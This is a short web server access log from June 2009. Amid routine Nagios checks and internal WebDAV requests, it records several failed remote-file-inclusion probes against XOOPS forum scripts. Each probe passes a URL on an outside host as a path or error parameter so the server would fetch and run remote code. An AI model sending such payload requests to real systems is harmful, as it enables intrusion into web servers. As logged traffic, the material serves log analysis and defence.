218.249.36.194 - - [10/Jun/2009:08:52:24 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:08:52:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [10/Jun/2009:08:52:44 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:52:44 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:52:44 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
69.237.82.158 - - [10/Jun/2009:08:52:53 -0400] "GET /errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
172.16.1.79 - - [10/Jun/2009:08:53:05 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [10/Jun/2009:08:53:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600" 172.16.1.